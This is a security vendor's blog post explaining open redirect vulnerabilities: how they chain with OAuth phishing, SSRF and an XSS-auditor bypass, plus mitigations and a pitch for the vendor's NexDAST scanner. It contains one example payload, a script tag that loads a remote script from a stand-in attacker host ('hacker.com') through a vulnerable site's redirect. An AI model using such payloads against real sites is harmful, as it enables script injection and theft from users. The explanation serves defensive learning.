Subscribe to our Blog

Get the Latest Application Security News and Content

Discovering and remediating Open Redirect Vulnerabilities

What is an Open Redirect Vulnerability?

An Open Redirect Vulnerability entails an attacker manipulating the user and redirecting them from one site to another (one with untrusted sources or even one made with malicious purposes in mind). The cybersecurity community doesn’t put enough emphasis on Open Redirect Vulnerabilities because it is most commonly connected to phishing scams and social engineering.

However, Open Redirect Vulnerabilities can help attackers in a whole host of ways that go far beyond phishing. The true risk of this vulnerability is when it is utilized and combined with Server Side Request Forgery, XSS-Auditor bypass, Oauth-flow, and so on. We will cover these in-depth later on in this post.

Different kinds of Open Redirects

For the purposes of this blog, we will focus primarily on Open Redirect vulnerabilities that are header and JavaScript-based. Header-based redirects work even when JavaScript isn’t interpreted while the JavaScript-based redirects only work in a situation when JavaScript is executed.

Header-Based Open Redirection

First things first, let’s talk about the Header-based Open Redirection, since it works even when a JavaScript doesn’t get interpreted. An HTTP Location header is a response header that does two things:

– It asks a browser to redirect a URL
– It provides information regarding the location of a resource that was recently created.

Basically, it’s JavaScript-independent and attackers utilize this tactic to successfully redirect the targeted user to another website. It’s simple but also incredibly effective if the user doesn’t carefully examine the URL for any strange additions to the code.

Javascript-Based Open Redirection

Server-side code (server-side functions) takes care of tasks like verifying data and requests and then sending the correct data to the user. While JavaScript-based Open Redirections won’t always work for a server-side function, an unexpecting victim and their web browser are susceptible to exploitation. When an attacker manages to perform a redirect in JavaScript, many dangerous vulnerabilities are possible. Since Open Redirections are mostly used in phishing scams, people aren’t aware of the fact that an Open Redirection can also be a part of a more complex chain of attacks where multiple vulnerabilities get exploited. And the JavaScript-based Open Redirection is an important part of that chain. For example, redirecting a user to javascript: something() ends up being a dangerous Cross-Site Scripting injection.

When Open Redirect becomes an issue

As we’ve mentioned before, most people just assume Open Redirects are always tied to phishing scams and social engineering. But they underestimate Open Redirects and how they can be used in conjunction with various attacks.

Let’s discuss how Open Redirect is used to steal users’ confidential information and data. Implementation of an Oauth-flow is best when an attacker wants a victim to sign up or log into any popular platform like Google, Facebook, Twitter, Linkedin, etc. A link will send the victim to the legit website in question (Instagram for example), and then the victim needs to enter their login information. But, then a redirect happens that sends the victim back to a bogus website that’s identical to the real one and the victim is asked to enter their data again, saying the username or the password was incorrect. That’s how your information is stolen, and then the attacker can exploit your information in many ways. Facebook deals with this by requesting a match between redirect_uri and a pre-configured URL, and if there is a mismatch, the redirection is denied. Unfortunately, most other platforms and services don’t do this.

In addition, we have Server Side Request Forgery and the Cross-site Scripting Auditor bypass. SSRF is an attack that can compromise a server. Exploiting an SSRF vulnerability makes it easy for a hacker to target the internal systems that hide behind a firewall or filters. Open Redirect is extremely useful when someone needs to bypass these filters. This way the attacker can access content from a domain that can redirect to any number of places. This is how a hacker enters a server and gets free reign to go wherever they please by combining Open Redirect with his SSRF.

Then there’s the Cross-site Scripting (XSS) Auditor bypass. Google Chrome, for example, has a built-in XSS-auditor which stops most attacks from going through. But, there’s a way to bypass this by using an Open Redirect. Since this XSS-auditor has no way to stop an attacker from including a bunch of scripts that are hosted at the identical domain. Then the Open Redirect lets you avoid the XSS-auditor with code like:

<script src=”https://vulnerable.com/path/https/hacker.com/payload.js“></script>

How to avoid Open Redirect vulnerabilities?

Try to avoid redirects completely if possible, especially those supplied via the GET method or ones that are based on user-controlled parameters. However, if avoiding the usage of redirecting isn’t an option these are the solutions:

– Whitelist your trustworthy URLs
– Implement a process that will validate a redirected target and sanitize it afterward
– Make developers aware of how Open Redirect vulnerability isn’t just used in a phishing scam and how hackers use them to exploit other vulnerabilities

NexDAST to the rescue

Another excellent way of remedying Open Redirect vulnerability is by utilizing NeuraLegion’s  NexDAST. A black-box security testing solution that examines your application, APIs, or WebSockets and tries to find a vulnerability. NexDAST is an automatic scanner that finds both standard and major security vulnerabilities on its own, without any human assistance. Because of this, our NexDAST solution is an excellent remedy for Open Redirect vulnerabilities as it can locate them swiftly and send alerts with remediation guidelines to the devs or automatically open tickets in the company’s bug tracking tool.

If you wish to learn more about our NexDAST solution, we have a blog that provides additional information and outlines its advantages. Anyone that read the blog and decided to try NexDAST can request a demo here. If you’re interested in our cutting-edge security solutions you can check out our Linkedin page for more content and you can even leave a comment about your thoughts on this blog!